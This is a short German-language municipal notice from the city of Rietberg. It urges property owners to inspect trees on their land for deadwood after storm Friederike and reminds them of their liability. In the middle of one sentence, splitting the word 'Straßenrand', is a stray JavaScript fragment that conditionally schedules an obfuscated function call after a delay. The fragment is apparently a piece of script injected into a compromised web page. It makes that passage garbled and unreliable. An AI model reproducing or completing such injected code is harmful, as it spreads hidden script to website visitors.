Bürger sollen Bäume auf ihrem Grund kontrollieren

Aus aktuellem Anlass, nach den Folgen von Sturmtief Friederike am 18. Januar, weist die Stadtverwaltung Rietberg darauf hin, wie wichtig es auch für Privatpersonen ist, auf die Sicherheit der Bäume auf eigenem Grund zu achten. Viele Bäume im Stadtgebiet haben Schaden genommen, aber nicht überall wurde bisher mit der nötigen Genauigkeit dafür gesorgt, dass von ihnen keine weitere Gefahr ausgeht.

Insbesondere am Straßenrandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and stehende Bäume können noch immer Totholz verlieren und so Schäden verursachen – an Autos, oder schlimmstenfalls trifft es Fußgänger. Haften muss in den meisten Fällen der Grundeigentümer. In manchen Fällen steht die Stadtverwaltung kurz davor, einzelne Straßen aus Sicherheitsgründen sperren zu müssen. Daher der Appell von Rietbergs Grünflächen-Beauftragter Heike Bennink, im Zuge der Verkehrssicherungspflicht Bäume auf privaten Grundflächen jetzt auf ihre Sicherheit zu prüfen.

Quelle: Stadt Rietberg